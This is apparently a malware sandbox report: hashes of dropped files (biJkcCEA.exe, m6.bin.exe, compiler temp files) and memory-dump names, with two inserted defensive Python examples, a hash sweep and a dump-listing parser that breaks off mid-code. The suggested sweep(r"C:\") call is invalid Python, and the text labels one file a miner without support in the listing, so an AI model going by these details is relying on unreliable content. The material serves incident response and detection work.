SHA256abe473b0d9bef464f071c686d0ba013b6ee94b393dc8cc8e8a68d7537b5a4fdf
SHA51288aa21b3d2f2fa3c14293a18f0bbf57a0881267519311c9a7c38f7d09b0e96f323a3cdfb51ce339e36544197ee8aed4b62d046bfda1d412a6ec50244617fec1e
-
\??\PIPE\srvsvcMD5
d41d8cd98f00b204e9800998ecf8427e
SHA1da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e
-
\??\PIPE\srvsvcMD5
d41d8cd98f00b204e9800998ecf8427e
SHA1da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e
-
\??\c:\Windows\Temp\2bcwf5oo\2bcwf5oo.0.csMD5
af75fb8f022e04b136acdde6acd561b1
SHA14dbff0f03842818e25dd5840c9d584ce57203eb2
SHA2567f910aa8e58a593ab3cd145fceff1ccb107e612d01235bf4e33e723c15a51ddc
SHA512dd497ad7c2c56063bfbf29bbc78cb68c36715b59762a473f5b83649789e2b33bf4c5d9e6afdbb584986ed70a6fbe06f30456cef7a2f7145a71c8e79bfc93b674
-
\??\c:\Windows\Temp\2bcwf5oo\2bcwf5oo.cmdlineMD5
82e0788298ab8d07d99a79e1db420c75
SHA1a541db9b9651bffab8f2a0a76d1509f4e4e67c82
SHA256ad5eb5c5118605e91d11c53d1fb4310c2434875516df9f464f6c94976d1f3c98
SHA5129f78febe3a327bf45ab5c546e41e5784d37458101547ec58417c0d94f2fce2231b26ebab623d83202852bf175e2f1108d4c3b194570c2944d50b101e5ae8ffa4
-
\??\c:\Windows\Temp\2bcwf5oo\CSC8E6015E52134C9E800F67490EACAF0.TMPMD5
8a7c239793e5dc2bfc581893daea5961
SHA1971cb45ce0a61e48521668534863576ebd283642
SHA256806191196669c3ffa6f90e7af3b5f1ddac8605c27ffea50d501967ed706c9c33
SHA5120c3ece8fed5f2acb869ce3622edc7acaa455f3f8ac2f8bd29109dd20e672e35ac7b0bcc10ac300e42b9cf85ae6cda6eb1c28df21d0b965945224272d43106fa9
-
\??\c:\Windows\Temp\cfmypwl0\cfmypwl0.0.csMD5
61de34babe19ff7e749966ce8eeeb066
SHA1d167fa904b2668ebb77a4d0330b25b9202f2ca04
SHA256393c99ae7b7af00cdaa00303b04f98d84cb1063b9068f0cf54ac3697bf432658
SHA512a9faeccb235ea167945ff134bfd51b225dd202af234e77d13c2c0a4240ddea669565212b85780bf6bd4a1b71e464b7d37a2424d813d89b09a89f1c2044a0ca8c
-
\??\c:\Windows\Temp\cfmypwl0\cfmypwl0.cmdlineMD5
755ff213a775ed024e4d09b411b921fa
SHA109058add0f0a2fe49a89aafcc49c99520ddbd654
SHA2561c009aaf2836c93531fdc73829f7dad315f0279e9939a532b3e9aa0b04f48fee
SHA512f0046077b82d89e575c84b9d08eb1f17b12f8ce55dcafee5be63e4220875b0162243617495e7d7bd0e6e193b33f892199beaf042f15694d216e5013eac52b81b
-
\??\c:\Windows\Temp\f5hj1zbh\CSCC9AA070B58D04584A89E871DCB5677EF.TMPMD5
213117fa0cf08bb738ed6aab996f92e7
SHA177d25e875fdf2b11ad25b7150772ee085c59fa5c
SHA256c2554cf152a1ecc50a8ee7b064ac7dca7cd99dd4003e6efefad589bc43e026c3
SHA5122445b3191291ad06ea9370f08f6ff3fb4aeae2a89be19c99d40783b2f8e1bf71e38cb9db413ed1ae5160be79761c0bf0bda2082d5100a9ff1a39de96ba5b981c
-
\??\c:\Windows\Temp\f5hj1zbh\f5hj1zbh.0.csMD5
4460a49f60d315e0c3c7fad8a00ce986
SHA13b2fe463443f15de8b46ee2662b1d2004b56ec81
SHA256d447f5d1b774a470a4ec1645df4cae9bc846c5d111f7549e0dec8411d7ebfd9e
SHA5124e13902ca2b7d910ba36ec13fd633817221e3c5db10dc9699ccaee187c5912e6a22bfb5f53c2814c143819a8595668cab279bbbb7762ab55a4793763fb6d880d
-
\??\c:\Windows\Temp\f5hj1zbh\f5hj1zbh.cmdlineMD5
91d232b6d497d4d6f20b0cfb30e109e4
SHA10abcc4b7b65a3ae1f6711e258f10deab8d4f1bca
SHA256c4c6706f0b3a438a54ea9ef1284d06436cd5d568db0fae9cfc1f97acdce04e93
SHA512bf6c854060e8e6d2534c162ea553a0d580eeed87599c82e2830c4445f1374bf1fd218be70f6af193b9810334483ad4ba23a69fd3be9fb47467c939e50265824d
-
\??\c:\Windows\Temp\j3wn4yby\CSCAFD0837FE44847118E3FE9B1E05923A5.TMPMD5
766af552e504707bece8957a9f343ab6
SHA152a78ace3df4624ebee8e38750a4f5e87521d31c
SHA256df8748e2f24f257d606c604edf6aa8be959a66dc2139b6ab16cdaa52aab9e44e
SHA512de3bede3b5ecc63d902ae657908a8d5a379189e2e1fd5d235984b77bb08864d29534e37b13ffa0ebd7815a126e39b093749635c1b4d59f5453156df731f9c133
-
\??\c:\Windows\Temp\j3wn4yby\j3wn4yby.0.csMD5
a3d53d439e4e86639f5906a98406c007
SHA135a6bc37eaf0b5c644a080f1e3281d880514473d
SHA25625ef21a1ac4c1bce799bb86569354494fb374a4c0e356a2af64cf99edfea7d49
SHA512edd8785b0b001f1ee9d1314b4b16efa34471d6034a44d73173b87793037a137edd603a73cf471e852d49d94b8eedc7c53115d29a1064d911a096ffb5c56fe180
-
\??\c:\Windows\Temp\j3wn4yby\j3wn4yby.cmdlineMD5
4f2a1ac33518ad35c0e14ec5ccee4b7e
SHA12eee860a498187754b6c85549b07627bf1baf499
SHA2568bb2e4978bffe140d1b210afda1ade9603963cc80f29f45aac7dc6d7909da755
SHA51283fad4ac411886e19cc6634bb295799753063a44204c09c5bfa91dc60c9a9e90261ca5de6467671f3dcae7de4f39d1341311d293bd80c83495ac38fbe9582f2e
-
\??\c:\Windows\Temp\nmvk3spo\CSC7FDDEC82A16F489D8239AB599BAC44.TMPMD5
8a3bbcad76e666e6b7bc4437c4c2a23e
SHA1184b1eaaf6756c8ea9680678672fde2d6c3bbca9
SHA256deb6204f478e45aa02b08cb82a28d029607cbe0fb57744f5676a2301f9a459e5
SHA512580773a014cb18ae80b46a0c07103edcb873171b94d294b9e898fe568bb4368f3a82f46734296f3f3f67f2fdf5cc31f2acf9d18243a7c01fc8dc082573e23c58
-
\??\c:\Windows\Temp\nmvk3spo\nmvk3spo.0.csMD5
4328678842a8599d0c8314228d95f137
SHA1b806433c6f30144b483149c437ba3dda2047ffb4
SHA2569920cfcc886b64a46bbe0fe38cdb515847247c2f5fa9b4df737cefb0e9865609
SHA512ddb1c2b4be08c13a0b36c4ed1ae903a66ff675021f5555a1e0abeeee9a6d9ee6a27960b1a5867e7c140664d5aeb8773bddb24dbf1a452cce9c0b980146fd2d53
-
\??\c:\Windows\Temp\nmvk3spo\nmvk3spo.cmdlineMD5
2b3191fa3f68f0cddfc34d994b77564f
SHA12f53fe199d050d2683a48c07624740a2e8d04a46
SHA256e1de939e5cd3b965197cd2be71f05349f4857307cf1a4ab9467e6ed3c6a2566c
SHA512309eb3c53ab7d39302a14116a349d3aef6ea24f037521007b518f9b2227e6b18fff7b069890ad6f95152e3883c1098b1c431e5b807189e046cd7a4c991d42adf
-
\??\c:\Windows\Temp\ruaz535h\CSC228D84EF599C4C40B0A4591652A9E121.TMPMD5
f6ea624572d746fa55249615e2d3b276
SHA10c38c14fd758a6ec4c9fd498c10be964c1b93bc9
SHA256b202a4517ef9ffb8aa94b5b104c7c00a77f204d36061bcb05de86556e04ee543
SHA51236b7f238d0f7c5e7276c69d4f04a1e82e3d9fb882da2cb9047ea57e18c58260396f58337c4fd856a4686e03fae3dd548b0605312f74d2093848a55054b890760
-
\??\c:\Windows\Temp\ruaz535h\ruaz535h.0.csMD5
0c98d6afbda2e78fe62a1e722d4d6919
SHA10bb51978a5828f4e5d31ed2654bf4d795e450199
SHA2569b575803aa7c94081eb9feb59ef133bec5ff9bcf2fda88102719b13dadc5b8bc
SHA51208794302417c7350599ecc8f548efb7238df22b7403630227386e91b5af770227e07cfe4f8599dbd35d0b8c634d8cb81aeeed946cb871c878a3d3faaff4bd2e7
-
\??\c:\Windows\Temp\ruaz535h\ruaz535h.cmdlineMD5
55c134153208341b28eb895a846e4cfe
SHA1dd966748d26949d49f49fe0502ef5ff50ff6734c
SHA25622bca7af848eebc7c48ea55dea339b33ef93af9e004bc74383bb8057d243a6cb
SHA512970d799c593dff461ce959485edb5e7db6853f48d0c3809a5acf02fb725347ab8cc2b55eb108e558fc24047f40bbf7c419c6c6d8c7fbbe4496637f7308caf490
-
\Windows\System32\WindowsPowerShell\v1.0\biJkcCEA.exeMD5
4a4cbece09f3b7090046b8aa726611df
SHA1f53aa0b940747952babecf6ec7dd5e7bfe0cf96e
SHA256f158f6290b79d36a599ede232a8472560c715a8c88924f7a2339259853067ae6
SHA5124759f5966f780929156604d4108bb6283a885f7ab1cd792f662cb12814bec40d6f75446980c8c0fedbbc895ab99ff8f2cb7948aefea552309d47dad97393bc0c
-
\Windows\System32\WindowsPowerShell\v1.0\biJkcCEA.exeMD5
4a4cbece09f3b7090046b8aa726611df
SHA1f53aa0b940747952babecf6ec7dd5e7bfe0cf96e
SHA256f158f6290b79d36a599ede232a8472560c715a8c88924f7a2339259853067ae6
SHA5124759f5966f780929156604d4108bb6283a885f7ab1cd792f662cb12814bec40d6f75446980c8c0fedbbc895ab99ff8f2cb7948aefea552309d47dad97393bc0c
-
\Windows\System32\WindowsPowerShell\v1.0\biJkcCEA.exeMD5
4a4cbece09f3b7090046b8aa726611df
SHA1f53aa0b940747952babecf6ec7dd5e7bfe0cf96e
SHA256f158f6290b79d36a599ede232a8472560c715a8c88924f7a2339259853067ae6
SHA5124759f5966f780929156604d4108bb6283a885f7ab1cd792f662cb12814bec40d6f75446980c8c0fedbbc895ab99ff8f2cb7948aefea552309d47dad97393bc0c
-
\Windows\System32\WindowsPowerShell\v1.0\biJkcCEA.exeMD5
4a4cbece09f3b7090046b8aa726611df
SHA1f53aa0b940747952babecf6ec7dd5e7bfe0cf96e
SHA256f158f6290b79d36a599ede232a8472560c715a8c88924f7a2339259853067ae6
SHA5124759f5966f780929156604d4108bb6283a885f7ab1cd792f662cb12814bec40d6f75446980c8c0fedbbc895ab99ff8f2cb7948aefea552309d47dad97393bc0c
-
\Windows\System32\WindowsPowerShell\v1.0\biJkcCEA.exeMD5
4a4cbece09f3b7090046b8aa726611df
SHA1f53aa0b940747952babecf6ec7dd5e7bfe0cf96e
SHA256f158f6290b79d36a599ede232a8472560c715a8c88924f7a2339259853067ae6
SHA5124759f5966f780929156604d4108bb6283a885f7ab1cd792f662cb12814bec40d6f75446980c8c0fedbbc895ab99ff8f2cb7948aefea552309d47dad97393bc0c
-
\Windows\System32\WindowsPowerShell\v1.0\biJkcCEA.exeMD5
4a4cbece09f3b7090046b8aa726611df
SHA1f53aa0b940747952babecf6ec7dd5e7bfe0cf96e
SHA256f158f6290b79d36a599ede232a8472560c715a8c88924f7a2339259853067ae6
SHA5124759f5966f780929156604d4108bb6283a885f7ab1cd792f662cb12814bec40d6f75446980c8c0fedbbc895ab99ff8f2cb7948aefea552309d47dad97393bc0c
-
\Windows\System32\WindowsPowerShell\v1.0\biJkcCEA.exeMD5
4a4cbece09f3b7090046b8aa726611df
SHA1f53aa0b940747952babecf6ec7dd5e7bfe0cf96e
SHA256f158f6290b79d36a599ede232a8472560c715a8c88924f7a2339259853067ae6
SHA5124759f5966f780929156604d4108bb6283a885f7ab1cd792f662cb12814bec40d6f75446980c8c0fedbbc895ab99ff8f2cb7948aefea552309d47dad97393bc0c
-
\Windows\System32\WindowsPowerShell\v1.0\biJkcCEA.exeMD5
4a4cbece09f3b7090046b8aa726611df
SHA1f53aa0b940747952babecf6ec7dd5e7bfe0cf96e
SHA256f158f6290b79d36a599ede232a8472560c715a8c88924f7a2339259853067ae6
SHA5124759f5966f780929156604d4108bb6283a885f7ab1cd792f662cb12814bec40d6f75446980c8c0fedbbc895ab99ff8f2cb7948aefea552309d47dad97393bc0c
-
\Windows\System32\WindowsPowerShell\v1.0\biJkcCEA.exeMD5
4a4cbece09f3b7090046b8aa726611df
SHA1f53aa0b940747952babecf6ec7dd5e7bfe0cf96e
SHA256f158f6290b79d36a599ede232a8472560c715a8c88924f7a2339259853067ae6
SHA5124759f5966f780929156604d4108bb6283a885f7ab1cd792f662cb12814bec40d6f75446980c8c0fedbbc895ab99ff8f2cb7948aefea552309d47dad97393bc0c
-
\Windows\Temp\m6.bin.exe
MD5 7825caa604fa63553e4419f582d4d631
SHA1 64352a227258f945f48e608f5b20baebe1be5bec
SHA256 e32457e43ed1b6afe0cb3088ed5cd238886247d832421ccf81ca41fd7d8a4f1a
SHA512 3b60249a51f78b3d196ede30ba2d111e1183a3eede655d464cdf84da374b471f22261d0dd74fc87615b851d213dc9065ec440ffc291b9e99d4f1c1f8a5124c76
-
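The two dropped binaries above are identified by path and by hash. The step a responder wants next is to check other hosts for the same content, and that has to be done by hash rather than by name, because the executable name (biJkcCEA.exe) is arbitrary and the same payload can land under another name. The following sweep is an added example, not part of the report or of the sandbox's tooling: the hashes and paths are copied from the entries above, the paths are treated as relative to the system drive (an assumption about how the report writes them), and the demo tree with its file contents is a constructed stand-in, not the real sample.

```python
"""Sweep a filesystem tree for the dropped files listed in this report.

Added example, not part of the report. The hashes and paths are copied
from the Files section above; the demo tree and its contents are
constructed stand-ins, not the real samples.
"""
import hashlib
import os
import tempfile
from typing import Dict, List, Set, Tuple

# Paths as written in the report, taken here as relative to the system drive.
REPORT_IOCS: Dict[str, Dict[str, str]] = {
    r"Windows\System32\WindowsPowerShell\v1.0\biJkcCEA.exe": {
        "md5": "4a4cbece09f3b7090046b8aa726611df",
        "sha1": "f53aa0b940747952babecf6ec7dd5e7bfe0cf96e",
        "sha256": "f158f6290b79d36a599ede232a8472560c715a8c88924f7a2339259853067ae6",
    },
    r"Windows\Temp\m6.bin.exe": {
        "md5": "7825caa604fa63553e4419f582d4d631",
        "sha1": "64352a227258f945f48e608f5b20baebe1be5bec",
        "sha256": "e32457e43ed1b6afe0cb3088ed5cd238886247d832421ccf81ca41fd7d8a4f1a",
    },
}


def hash_bytes(data: bytes) -> Dict[str, str]:
    """MD5/SHA-1/SHA-256 of an in-memory buffer (MD5 and SHA-1 only for matching older feeds)."""
    return {
        "md5": hashlib.md5(data).hexdigest(),
        "sha1": hashlib.sha1(data).hexdigest(),
        "sha256": hashlib.sha256(data).hexdigest(),
    }


def hash_file(path: str) -> Dict[str, str]:
    """Hash a file in chunks so large files do not need to fit in memory."""
    digests = {name: hashlib.new(name) for name in ("md5", "sha1", "sha256")}
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(1 << 20), b""):
            for d in digests.values():
                d.update(chunk)
    return {name: d.hexdigest() for name, d in digests.items()}


def report_sha256s() -> Set[str]:
    """The SHA-256 values from the report, which is the only algorithm the sweep matches on."""
    return {v["sha256"] for v in REPORT_IOCS.values()}


def sweep(root: str, sha256_iocs: Set[str]) -> List[Tuple[str, str]]:
    """Walk root and return (relative path, sha256) for every file whose SHA-256 is an IoC.

    Matching is by content, not by file name or location, so a renamed or
    relocated copy of the payload is still found.
    """
    hits = []
    for dirpath, _, names in os.walk(root):
        for name in names:
            path = os.path.join(dirpath, name)
            try:
                digest = hash_file(path)["sha256"]
            except OSError:
                continue  # unreadable or vanished file: keep sweeping
            if digest in sha256_iocs:
                rel = os.path.relpath(path, root).replace(os.sep, "/")
                hits.append((rel, digest))
    return sorted(hits)


def demo() -> List[str]:
    """Build a constructed tree with one stand-in 'payload' and one benign file,
    sweep it with the report's IoCs plus the stand-in's hash, and return the
    relative paths that matched."""
    stand_in = b"constructed stand-in for m6.bin.exe; not the real sample\n"
    iocs = report_sha256s() | {hash_bytes(stand_in)["sha256"]}
    with tempfile.TemporaryDirectory() as root:
        tmp = os.path.join(root, "Windows", "Temp")
        os.makedirs(tmp)
        with open(os.path.join(tmp, "m6.bin.exe"), "wb") as f:
            f.write(stand_in)
        with open(os.path.join(tmp, "notes.txt"), "wb") as f:
            f.write(b"unrelated content\n")
        return [rel for rel, _ in sweep(root, iocs)]


if __name__ == "__main__":
    print(demo())
```

On a real host run `sweep(r"C:\", report_sha256s())` (or point it at a mounted image); the demo exists only so the block runs offline. A hit on the hash is strong, but a miss is not clearance: the report's hashes cover one build of the miner and one build of the dropped executable, and a later download from the same infrastructure may differ.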
memory/760-16-0x0000000000000000-mapping.dmp
-
memory/872-49-0x0000000000000000-mapping.dmp
-
memory/876-223-0x0000000000000000-mapping.dmp
-
memory/896-4-0x0000000000000000-mapping.dmp
-
memory/984-224-0x0000000000000000-mapping.dmp
-
memory/1064-219-0x0000000000000000-mapping.dmp
-
memory/1092-40-0x0000000000000000-mapping.dmp
-
memory/1172-42-0x0000000000000000-mapping.dmp
-
memory/1180-20-0x000000001A920000-0x000000001A921000-memory.dmp Filesize 4KB
-
memory/1180-11-0x00000000023D0000-0x00000000023D1000-memory.dmp Filesize 4KB
-
memory/1180-15-0x000000001C360000-0x000000001C361000-memory.dmp Filesize 4KB
-
memory/1180-14-0x0000000002400000-0x0000000002401000-memory.dmp Filesize 4KB
-
memory/1180-255-0x000000001ABA9000-0x000000001ABAB000-memory.dmp Filesize 8KB
-
memory/1180-32-0x0000000002710000-0x0000000002711000-memory.dmp Filesize 4KB
-
memory/1180-33-0x000000001A960000-0x000000001A961000-memory.dmp Filesize 4KB
-
memory/1180-13-0x000000001AB84000-0x000000001AB86000-memory.dmp Filesize 8KB
-
memory/1180-12-0x000000001AB80000-0x000000001AB82000-memory.dmp Filesize 8KB
-
memory/1180-17-0x00000000025F0000-0x00000000025F1000-memory.dmp Filesize 4KB
-
memory/1180-10-0x000000001AC00000-0x000000001AC01000-memory.dmp Filesize 4KB
-
memory/1180-9-0x0000000002290000-0x0000000002291000-memory.dmp Filesize 4KB
-
memory/1180-8-0x000007FEF4EE0000-0x000007FEF58CC000-memory.dmp Filesize 9.9MB
-
memory/1180-5-0x0000000000000000-mapping.dmp
-
memory/1180-34-0x000000001AB8A000-0x000000001ABA9000-memory.dmp Filesize 124KB
-
memory/1204-48-0x0000000000000000-mapping.dmp
-
memory/1320-211-0x0000000000000000-mapping.dmp
-
memory/1348-47-0x0000000000000000-mapping.dmp
-
memory/1348-217-0x0000000000000000-mapping.dmp
-
memory/1488-148-0x0000000000000000-mapping.dmp
-
memory/1528-3-0x0000000000000000-mapping.dmp
-
memory/1564-209-0x00000000191BA000-0x00000000191D9000-memory.dmp Filesize 124KB
-
memory/1564-164-0x000007FEF4EE0000-0x000007FEF58CC000-memory.dmp Filesize 9.9MB
-
memory/1564-180-0x00000000191B0000-0x00000000191B2000-memory.dmp Filesize 8KB
-
memory/1564-181-0x00000000191B4000-0x00000000191B6000-memory.dmp Filesize 8KB
-
memory/1564-215-0x0000000019190000-0x0000000019191000-memory.dmp Filesize 4KB
-
memory/1564-157-0x0000000000000000-mapping.dmp
-
memory/1564-36-0x0000000000000000-mapping.dmp
-
memory/1580-227-0x0000000000000000-mapping.dmp
-
memory/1580-43-0x0000000000000000-mapping.dmp
-
memory/1608-234-0x0000000000000000-mapping.dmp
-
memory/1644-46-0x0000000000000000-mapping.dmp
-
memory/1664-83-0x0000000000000000-mapping.dmp
-
memory/1664-38-0x0000000000000000-mapping.dmp
-
memory/1696-228-0x0000000000000000-mapping.dmp
-
memory/1696-44-0x0000000000000000-mapping.dmp
-
memory/1728-45-0x0000000000000000-mapping.dmp
-
memory/1776-288-0x0000000000080000-0x0000000000094000-memory.dmp Filesize 80KB
-
memory/1776-296-0x0000000000BD0000-0x0000000000BF0000-memory.dmp Filesize 128KB
-
memory/1776-295-0x0000000000520000-0x0000000000540000-memory.dmp Filesize 128KB
-
memory/1812-37-0x0000000000000000-mapping.dmp
-
memory/1852-39-0x0000000000000000-mapping.dmp
-
memory/1932-2-0x000007FEFB541000-0x000007FEFB543000-memory.dmp Filesize 8KB
-
memory/1932-258-0x0000000002380000-0x0000000002384000-memory.dmp Filesize 16KB
-
memory/1948-35-0x0000000000000000-mapping.dmp
-
memory/2028-41-0x0000000000000000-mapping.dmp
-
memory/2072-50-0x0000000000000000-mapping.dmp
-
memory/2072-71-0x0000000000000000-mapping.dmp
-
memory/2080-221-0x0000000000000000-mapping.dmp
-
memory/2112-51-0x0000000000000000-mapping.dmp
-
memory/2112-155-0x0000000000000000-mapping.dmp
-
memory/2140-154-0x0000000000000000-mapping.dmp
-
memory/2180-222-0x0000000000000000-mapping.dmp
-
memory/2192-156-0x0000000000000000-mapping.dmp
-
memory/2240-225-0x0000000000000000-mapping.dmp
-
memory/2296-53-0x0000000000000000-mapping.dmp
-
memory/2348-226-0x0000000000000000-mapping.dmp
-
memory/2376-74-0x0000000000FA0000-0x0000000000FA1000-memory.dmp Filesize 4KB
-
memory/2376-84-0x0000000019660000-0x0000000019661000-memory.dmp Filesize 4KB
-
memory/2376-75-0x0000000000FB0000-0x0000000000FB1000-memory.dmp Filesize 4KB
-
memory/2376-54-0x0000000000000000-mapping.dmp
-
memory/2376-59-0x0000000019710000-0x0000000019712000-memory.dmp Filesize 8KB
-
memory/2376-60-0x0000000019714000-0x0000000019716000-memory.dmp Filesize 8KB
-
memory/2376-70-0x0000000000E60000-0x0000000000E61000-memory.dmp Filesize 4KB
-
memory/2376-72-0x0000000000EF0000-0x0000000000EF1000-memory.dmp Filesize 4KB
-
memory/2376-82-0x0000000001170000-0x0000000001171000-memory.dmp Filesize 4KB
-
memory/2376-56-0x000007FEF4EE0000-0x000007FEF58CC000-memory.dmp Filesize 9.9MB
-
memory/2376-96-0x00000000011A0000-0x00000000011A1000-memory.dmp Filesize 4KB
-
memory/2376-73-0x0000000000F00000-0x0000000000F01000-memory.dmp Filesize 4KB
-
memory/2380-207-0x0000000000000000-mapping.dmp
-
memory/2420-250-0x0000000002610000-0x0000000002612000-memory.dmp Filesize 8KB
-
memory/2420-247-0x000007FEF4EE0000-0x000007FEF58CC000-memory.dmp Filesize 9.9MB
-
memory/2420-251-0x0000000002614000-0x0000000002616000-memory.dmp Filesize 8KB
-
memory/2444-229-0x0000000000000000-mapping.dmp
-
memory/2448-231-0x0000000000000000-mapping.dmp
-
memory/2468-230-0x0000000000000000-mapping.dmp
-
memory/2524-184-0x0000000000000000-mapping.dmp
-
memory/2584-114-0x0000000000000000-mapping.dmp
-
memory/2584-186-0x0000000000000000-mapping.dmp
-
memory/2600-190-0x0000000000000000-mapping.dmp
-
memory/2628-91-0x0000000000000000-mapping.dmp
-
memory/2628-246-0x00000000193B9000-0x00000000193BB000-memory.dmp Filesize 8KB
-
memory/2628-242-0x000000001B120000-0x000000001B122000-memory.dmp Filesize 8KB
-
memory/2628-93-0x000007FEF4EE0000-0x000007FEF58CC000-memory.dmp Filesize 9.9MB
-
memory/2628-98-0x0000000019390000-0x0000000019392000-memory.dmp Filesize 8KB
-
memory/2628-99-0x0000000019394000-0x0000000019396000-memory.dmp Filesize 8KB
-
memory/2628-125-0x000000001939A000-0x00000000193B9000-memory.dmp Filesize 124KB
-
memory/2644-199-0x0000000019464000-0x0000000019466000-memory.dmp Filesize 8KB
-
memory/2644-191-0x0000000000000000-mapping.dmp
-
memory/2644-195-0x000007FEF4EE0000-0x000007FEF58CC000-memory.dmp Filesize 9.9MB
-
memory/2644-198-0x0000000019460000-0x0000000019462000-memory.dmp Filesize 8KB
-
memory/2732-115-0x0000000000000000-mapping.dmp
-
memory/2736-235-0x0000000000000000-mapping.dmp
-
memory/2740-118-0x000007FEF4EE0000-0x000007FEF58CC000-memory.dmp Filesize 9.9MB
-
memory/2740-121-0x0000000019780000-0x0000000019782000-memory.dmp Filesize 8KB
-
memory/2740-122-0x0000000019784000-0x0000000019786000-memory.dmp Filesize 8KB
-
memory/2740-116-0x0000000000000000-mapping.dmp
-
memory/2788-168-0x000007FEF4EE0000-0x000007FEF58CC000-memory.dmp Filesize 9.9MB
-
memory/2788-179-0x0000000019584000-0x0000000019586000-memory.dmp Filesize 8KB
-
memory/2788-178-0x0000000019580000-0x0000000019582000-memory.dmp Filesize 8KB
-
memory/2788-158-0x0000000000000000-mapping.dmp
-
memory/2788-236-0x000000001958A000-0x00000000195A9000-memory.dmp Filesize 124KB
-
memory/2792-232-0x0000000000000000-mapping.dmp
-
memory/2864-233-0x0000000000000000-mapping.dmp
-
memory/2924-216-0x0000000000000000-mapping.dmp
-
memory/2964-218-0x0000000000000000-mapping.dmp
-
memory/2976-220-0x0000000000000000-mapping.dmp
-
memory/3036-149-0x0000000000000000-mapping.dmp
-
memory/3040-150-0x0000000000000000-mapping.dmp
-
memory/3068-312-0x0000000000F00000-0x0000000000F02000-memory.dmp Filesize 8KB
-
memory/3068-282-0x00000000192E0000-0x00000000192E1000-memory.dmp Filesize 4KB
-
memory/3068-298-0x0000000000950000-0x0000000000951000-memory.dmp Filesize 4KB
-
memory/3068-324-0x0000000000AE0000-0x0000000000AE1000-memory.dmp Filesize 4KB
-
memory/3068-303-0x0000000000F1A000-0x0000000000F39000-memory.dmp Filesize 124KB
-
memory/3068-323-0x0000000000F3A000-0x0000000000F3B000-memory.dmp Filesize 4KB
-
memory/3068-322-0x0000000000F39000-0x0000000000F3A000-memory.dmp Filesize 4KB
-
memory/3068-152-0x0000000000000000-mapping.dmp
-
memory/3068-281-0x0000000000940000-0x0000000000942000-memory.dmp Filesize 8KB
-
memory/3068-162-0x000007FEF4EE0000-0x000007FEF58CC000-memory.dmp Filesize 9.9MB
-
memory/3068-169-0x0000000000F10000-0x0000000000F12000-memory.dmp Filesize 8KB
-
memory/3068-170-0x0000000000F14000-0x0000000000F16000-memory.dmp Filesize 8KB
-
memory/3068-283-0x0000000019F10000-0x0000000019F11000-memory.dmp Filesize 4KB
-
memory/3068-275-0x0000000000930000-0x0000000000932000-memory.dmp Filesize 8KB
-
memory/3320-317-0x000000001A2E0000-0x000000001A2E1000-memory.dmp Filesize 4KB
-
memory/3320-318-0x00000000008F0000-0x00000000008F1000-memory.dmp Filesize 4KB
-
memory/3320-313-0x0000000001040000-0x0000000001041000-memory.dmp Filesize 4KB
-
memory/3320-321-0x00000000011D0000-0x00000000011D2000-memory.dmp Filesize 8KB
-
memory/3320-304-0x0000000001070000-0x0000000001072000-memory.dmp Filesize 8KB
-
memory/3320-305-0x0000000001074000-0x0000000001076000-memory.dmp Filesize 8KB
-
memory/3320-300-0x000007FEF4EE0000-0x000007FEF58CC000-memory.dmp Filesize 9.9MB
-
memory/3908-267-0x00000000008A0000-0x00000000008B1000-memory.dmp Filesize 68KB
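The dump names above follow one scheme: memory/<pid>-<index>-0x<start>-0x<end>-memory.dmp carries an address range and a reported Filesize, while memory/<pid>-<index>-0x0000000000000000-mapping.dmp carries no range. Two things are worth pulling out of such a listing before opening any dump: whether each reported size actually equals end minus start (a disagreement means the name and the file describe different regions), and which ranges were dumped from more than one process. Here the 0x000007FEF4EE0000-0x000007FEF58CC000 region appears under PIDs 1180, 1564, 2376, 2420, 2628, 2644, 2740, 2788, 3068 and 3320; a region that recurs at the same address across many processes is, as a rule, a shared mapped image rather than something injected into one process, and the per-process regions are the ones to look at first. The parser below is an added example, not part of the report or of any sandbox's tooling; its sample lines are copied from the listing above except the PID 9999 entry, which is constructed to show what a size mismatch looks like.

```python
"""Parser and consistency check for the memory-dump listing in this report.

Added example, not part of the report or of any sandbox's tooling. The
sample lines are copied from the listing above except the PID 9999 entry,
which is constructed to show a size mismatch.
"""
import re
from collections import defaultdict
from dataclasses import dataclass
from typing import Dict, List, Optional, Tuple

# memory/<pid>-<index>-0x<start>-0x<end>-memory.dmp followed by its Filesize,
# or memory/<pid>-<index>-0x0-mapping.dmp, which has no address range.
DUMP_RE = re.compile(
    r"(memory/(\d+)-(\d+)-0x([0-9A-Fa-f]+)-0x([0-9A-Fa-f]+)-memory\.dmp)"
    r"\s*Filesize:?\s*([\d.]+)\s*(KB|MB)"
)
MAPPING_RE = re.compile(r"(memory/(\d+)-(\d+)-0x0+-mapping\.dmp)")

# Constructed excerpt: all lines are from the report except the PID 9999 one.
SAMPLE_LISTING = """\
memory/760-16-0x0000000000000000-mapping.dmp
memory/1180-8-0x000007FEF4EE0000-0x000007FEF58CC000-memory.dmp Filesize 9.9MB
memory/1180-34-0x000000001AB8A000-0x000000001ABA9000-memory.dmp Filesize 124KB
memory/1564-164-0x000007FEF4EE0000-0x000007FEF58CC000-memory.dmp Filesize 9.9MB
memory/1776-288-0x0000000000080000-0x0000000000094000-memory.dmp Filesize 80KB
memory/3908-267-0x00000000008A0000-0x00000000008B1000-memory.dmp Filesize 68KB
memory/9999-1-0x0000000000400000-0x0000000000401000-memory.dmp Filesize 8KB
"""


@dataclass
class Dump:
    name: str
    pid: int
    seq: int
    kind: str                # "memory" (has an address range) or "mapping"
    start: Optional[int]
    end: Optional[int]
    reported: Optional[str]  # size exactly as printed in the report


def format_size(nbytes: int) -> str:
    """Render a byte count the way the report does: one decimal of MB at or
    above 1 MiB, otherwise whole KB."""
    if nbytes >= 1 << 20:
        return f"{nbytes / (1 << 20):.1f}MB"
    return f"{nbytes // 1024}KB"


def parse_dump_listing(text: str) -> List[Dump]:
    """Turn listing lines into Dump records; lines that match neither pattern are skipped."""
    dumps: List[Dump] = []
    for line in text.splitlines():
        m = DUMP_RE.search(line)
        if m:
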